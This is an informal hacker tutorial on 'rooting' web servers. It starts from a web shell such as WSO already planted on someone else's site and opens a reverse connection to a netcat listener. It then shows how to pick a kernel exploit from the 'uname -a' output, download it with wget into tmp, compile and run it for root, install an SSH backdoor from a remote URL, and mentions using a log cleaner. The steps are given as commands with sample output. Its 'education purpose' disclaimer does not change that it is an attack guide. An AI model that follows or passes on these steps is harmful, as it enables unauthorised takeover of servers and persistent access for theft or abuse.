Learn Root - Totally Explaind

#So Lets Start...

These are Some Basic Questions asked by myself as a n00b :P

# What is rooting ?
A. Getting access to the user => "root", the main admin of the site.

# What is the need of rooting ?
A. Getting master admin privillages of Servers 

Things you need

# A Shell on a Website
# An Exploit
# Log cleaner
# Ssh Backdoor
# Netcat
# A Brain

Simply you can seach on http://www.google.com for these, except BRAIN and SHELL 

Getting Back Connection to the servers

Open command prompt, and go to NetCat Path, Type
"cd netcat.exe"

ok Open your Shell in your browser, go to the back connection tab, if it is not there get a shell like "WSO 2.3" or Any other
thats your choice....

Specify your "ip & port as 2121". press connect, now you'll get a shell to the server, you can give commands to the server through that shell.

now came back to netcat and type "nc -l -v -p 2121"

it will give you this output:
c:\netcat>nc -l -v -p 2121
listening on [any] 2121 ...

Getting a Right exploit for the servers

Type : Uname -a & hit enter.
It'll look something like this:

[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.18-194.26.1.el5 #1 SMP Tue Nov 9 12:54:20 EST 2010 x86_64 x86_64 x86_64 GNU/Linux

You have noted, It shows the kernal version of the server is: 2.6.18-194.26.1.el5
& Year is 2010.

You need to find a perfect exploit for it. you can find them at:-
$ Exploit-db.com
$ Packetstormsecurity.org
$ Th3-0utl4ws.com
$ Leetupload.com

Compiling & executing exploits

Now I've got a exploit, & it is written in C. So I can't execute it by just uploading. but I need to compile it.

Before proceeding further, Cd into the tmp directory, because it is always writable. So type: Cd /home/XXXXX/public_html/tmp
// The path may be different, replace it with yours.

So first I'll get the exploit on the server, So I type : Wget http://exploitsite.net/2010-exploits/exploit.c
// Note: There is no such site, I'm just taking it to show you.
It'll look something Like this:-

admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http://exploitsite.net/2010-exploits/exploit.c
--2011-01-25 08:21:43-- http://exploitsite.net/2010-exploits/exploit.c
Resolving www.exploitsite.net...
Connecting to www.exploitsite.net||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15088 (15K) [text/x-csrc]
Saving to: `exploit.c'

now change the permission of the exploit to 777.
Type: "Chmod 777 exploit.c"

Now the exploit is On my server, I just need to compile & execute it.
So, I'll give the command: "gcc -o exploit exploit.c"
It'll compile & save the exploit as >> exploit

Next step is to execute it So we'll type: "./exploit"

here it'll show different process...
: #
: #
got root you m0f0 !! [<example]

Now it say got root. Let's Check is it true,
Type: "whoami"

then it will say

like: uid=0(root) gid=0(root) groups=0(root)

type "su" to get full privilages !

Installing Backdoors

type: "Wget http://www.urlofbackdoor.com/sshdoor.zip"

Then Type,
Unzip Sshdoor.zip
Then, => Cd sshdoor
Then type, ./run pass port
^ replace pass with your password, & a port.

Now connect with putty & enjoy root privileges. 

Methods to execute exploits written in other languages

C exploit

gcc -o exploit exploit.c
chmod +x exploit

Perl Exploits

perl exploit.pl


python exploit.py


php exploit.php


unzip exploit.zip

Just fo Education Purpose !!

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